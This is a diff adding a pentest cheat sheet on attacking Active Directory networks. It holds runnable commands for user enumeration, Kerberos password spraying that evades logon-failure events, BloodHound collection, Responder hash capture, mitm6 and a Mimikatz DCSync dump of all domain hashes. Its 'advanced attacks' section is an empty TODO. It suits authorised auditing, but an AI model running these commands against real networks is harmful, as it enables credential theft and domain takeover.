|
|
@@ -0,0 +1,150 @@
|
|
|
+---
|
|
|
+title: Internal Network Audit
|
|
|
+categories: [cheatsheets]
|
|
|
+tags: [windows, security, network, AD]
|
|
|
+---
|
|
|
+
|
|
|
+# Internal Network Audit
|
|
|
+
|
|
|
+## Low Hanging Fruits
|
|
|
+
|
|
|
+### AD User Details
|
|
|
+
|
|
|
+* use PowerView to list domain users with more information
|
|
|
+ - [https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView)
|
|
|
+ - Admin Account Flag
|
|
|
+ - lastlogon
|
|
|
+ - badpwdcount
|
|
|
+ - pwdlastset
|
|
|
+ - description (sometimes used to store passwords)
|
|
|
+
|
|
|
+* Get accountname & descriptions
|
|
|
+```
|
|
|
+Get-DomainUser | Select-Object -Properties samaccountname,description
|
|
|
+```
|
|
|
+* Get Accounts sorted by pwdlastset
|
|
|
+```
|
|
|
+Get-DomainUser -Properties samaccountname,pwdLastSet | where {$_.samaccountname -ne 'DefaultAccount' -AND $_.samaccountname -ne 'Guest'} | sort pwdLastSet | ft -wrap -autosize
|
|
|
+```
|
|
|
+
|
|
|
+### Password Spraying via Kerberos
|
|
|
+
|
|
|
+* using the Tool kerbrute by ropnop
|
|
|
+ - [https://github.com/ropnop/kerberos_windows_scripts](https://github.com/ropnop/kerberos_windows_scripts)
|
|
|
+ - [https://github.com/ropnop/kerbrute](https://github.com/ropnop/kerbrute)
|
|
|
+* uses kerberos preauthentication
|
|
|
+* only 2 UDP frames
|
|
|
+* no logon failure event (4625)
|
|
|
+* **Important:** note how many password trys are possible before locking an account
|
|
|
+
|
|
|
+```
|
|
|
+kerbrute passwordspray -d <domain> users.txt Summer2019!
|
|
|
+```
|
|
|
+
|
|
|
+### Bloodhound
|
|
|
+
|
|
|
+* Bloodhound Ingestors can be used to enumerate domain specific information from the DC
|
|
|
+* Ingestors:
|
|
|
+ - PS (default ingestor)
|
|
|
+ - python (`pip install blodohound`)
|
|
|
+ - C# (Sharphound)
|
|
|
+* can be executed from domain-joined and non-domain-joined computers.
|
|
|
+
|
|
|
+* With the python ingestor
|
|
|
+```
|
|
|
+# Domain-joined host, working DNS
|
|
|
+bloodhound-python -u user@DOMAIN -p PASSWORD
|
|
|
+
|
|
|
+# Non-Domain-Joined Hosts / DNS troubles
|
|
|
+bloodhound-python -u user@DOMAIN -p PASSWORD -d DOMAIN -dc DC1.DOMAIN.COM -gc DC1.DOMAIN.COM
|
|
|
+```
|
|
|
+
|
|
|
+* SharpHound
|
|
|
+```
|
|
|
+# get all information from the DC
|
|
|
+SharpHound.exe -c All
|
|
|
+# connects to any computer in the AD for 24h to get session information
|
|
|
+SharpHound.exe -c SessionLoop --MaxLoopTime 24h
|
|
|
+```
|
|
|
+
|
|
|
+### Local AD Accounts
|
|
|
+
|
|
|
+* check the local Serviec account if any AD account is used
|
|
|
+* open `Services` and sort by "Log On As"
|
|
|
+* -> Find AD Accounts
|
|
|
+* Mimikatz to get the (cleartext) password
|
|
|
+
|
|
|
+
|
|
|
+### Responder Action - Attacks against the NTLM authentication protocol
|
|
|
+
|
|
|
+* [https://github.com/lgandx/Responder](https://github.com/lgandx/Responder)
|
|
|
+* Responder is able to capture LLMNR & NetBios broadcast requests to capture NetNTLM hashes on the network
|
|
|
+* NetNTLM can be bruteforced (very slow, only possible with bad password policy)
|
|
|
+* NTLM relaying (see below)
|
|
|
+
|
|
|
+```
|
|
|
+sh> responder.py -c config -I eth0
|
|
|
+```
|
|
|
+
|
|
|
+* what triggers llmnr and NetBios broadcasts?
|
|
|
+ - If a domain cannot be resolved by DNS (wont work in new browsers)
|
|
|
+ - Set DNS entries as unprivileged users
|
|
|
+ - if IPv6 is not configured, it overrules IPv4 (Tool: MITM6)
|
|
|
+
|
|
|
+### mitm6
|
|
|
+
|
|
|
+* Code: [https://github.com/fox-it/mitm6](https://github.com/fox-it/mitm6)
|
|
|
+* Windows (since Windows Vista) prefers IPv6 over IPv4
|
|
|
+* If IPv6 is not configured, an attacker can abuse this preference by acting as malicious DNS server
|
|
|
+ - answers all DHCPv6 messages to setup a IPv6 ip as new DNS server on the victim machine.
|
|
|
+* Works perfect in combination with WPAD and NTLM relaying attacks
|
|
|
+* Details: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
|
|
|
+
|
|
|
+
|
|
|
+### DC Sync
|
|
|
+
|
|
|
+* Account with the rights "GenericAll" needed
|
|
|
+* Can be used for a dcsync attack with mimikatz (`lsadump::dcsync /domain:<domain> /all /csv`)
|
|
|
+* -> This gets every NTLM hash from the DC
|
|
|
+* -> krbtgt hash can be used to create golden tickets
|
|
|
+
|
|
|
+
|
|
|
+### Attacking SMB
|
|
|
+
|
|
|
+* Tool: CrackMapExec [https://github.com/byt3bl33d3r/CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
|
|
|
+* Detailed Wiki Page:
|
|
|
+ - [https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference](https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference)
|
|
|
+
|
|
|
+* Enumerating SMB shares and saving ips where SMB signing is disabled
|
|
|
+```
|
|
|
+sh> cme smb <cidr> --gen-relay-list targets.txt
|
|
|
+
|
|
|
+SMB 192.168.1.101 445 DC2012A [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A) (domain:OCEAN) (signing:True) (SMBv1:True)
|
|
|
+SMB 192.168.1.102 445 DC2012B [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B) (domain:EARTH) (signing:True) (SMBv1:True)
|
|
|
+SMB 192.168.1.111 445 SERVER1 [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:SERVER1) (domain:PACIFIC) (signing:False) (SMBv1:True)
|
|
|
+SMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)�
|
|
|
+```
|
|
|
+
|
|
|
+
|
|
|
+### Tipps: **GenericAll**
|
|
|
+
|
|
|
+* Access without changing the password of another user:
|
|
|
+ - Logon Script
|
|
|
+ - Kerberoasting
|
|
|
+ - AS-REP Roast
|
|
|
+ - DC Sync + DC Shadow to reset old password
|
|
|
+
|
|
|
+
|
|
|
+
|
|
|
+## More Advanced Attacks
|
|
|
+
|
|
|
+TODO
|
|
|
+
|
|
|
+### Kerberoasting
|
|
|
+
|
|
|
+### AS-REP Roast
|
|
|
+
|
|
|
+### NTLM relaying attack
|
|
|
+
|
|
|
+
|
|
|
+
|
Marius Schwarz